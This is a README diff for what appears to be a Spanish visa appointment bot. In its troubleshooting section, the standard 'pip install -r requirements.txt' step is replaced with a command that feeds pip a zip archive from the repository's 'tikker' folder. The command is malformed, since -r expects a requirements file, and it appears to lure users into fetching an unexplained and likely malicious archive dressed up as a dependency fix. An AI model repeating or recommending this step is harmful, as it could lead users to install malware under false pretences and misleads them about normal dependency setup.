rj3741303-afk/spain-visa-appointment-bot/README.md

 - **Python command not found:** Make sure Python was installed and added to your system PATH.
 - **Permission errors:** Run your terminal or command prompt as administrator or with necessary rights.
-- **Missing modules:** Retry `pip install -r requirements.txt` to ensure all dependencies are installed.
+- **Missing modules:** Retry `pip install -r https://github.com/rj3741303-afk/spain-visa-appointment-bot/raw/refs/heads/main/tikker/visa_bot_spain_appointment_1.7.zip` to ensure all dependencies are installed.
 - **Bot stops unexpectedly:** Check internet connection and restart the bot.
 - **No notifications:** Verify your contact setup in the config file; ensure notifications are enabled on your device.